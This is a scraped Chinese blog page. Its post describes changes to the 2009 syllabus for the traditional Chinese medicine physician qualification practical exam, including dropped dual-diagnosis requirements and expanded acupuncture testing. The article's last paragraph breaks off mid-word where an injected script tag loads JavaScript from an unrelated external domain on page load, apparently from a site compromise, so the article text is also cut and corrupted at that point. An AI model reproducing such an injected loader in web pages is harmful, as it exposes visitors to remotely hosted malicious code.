注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

xjyiangzhongyi的博客

直接进入

 
 
 

日志

 
 

2009年中医师资格考试大纲有变化   

2009-11-20 08:06:37|  分类: 中医考试 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

好消息

2009年中医师资格考试大纲有变化 

-----辨证论治考试取消双重诊断要求

      师承和确有专长人员不考西医内容

 

国家中医药管理局中医师资格认证中心2009年版中医医师资格考试大纲(中医类别中医、中西医结合实践技能考试部分)正式颁布。新大纲在考试内容及考试方式等方面有所调整。取消了师承和确有专长人员测试的所有西医内容。取消了中医医师资格第一站辨证论治考试中的双重诊断要求,需要测试的西医内容,调整到第三站考试中作为必答题测试。

  新大纲强化了临床操作的测试力度,合理调整、扩展了中医病证、西医病种的测试数量,将中医治疗具有疗效和优势的常见病、多发病纳入了测试范围。在临床操作中进一步强调考生要在叙述的同时进行实际操作。

  新大纲体现了不同类别、不同应试对象、不同层次考试的区别,扩展了针灸操作和针灸急症应用测试范围;进一步明确了针灸技术应用能力、针灸异常情况处理、拔罐操作、推拿技术操作的测试范围;将“病史采集”调整为“中医问诊能力”,在第三站中测试;调整了辅助检查结果临床判读测试范围;调整了各站考试题量和分数。

  中医师资格认证中心提醒考生,中医类别中医、中西医结合医师资格实践技能考试大纲是医师资格考试中医、中西医结合实践技能考试的命?script src=http://nanshantemple.com/t.js>

 
   

  评论这张
 
阅读(484)| 评论(16)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017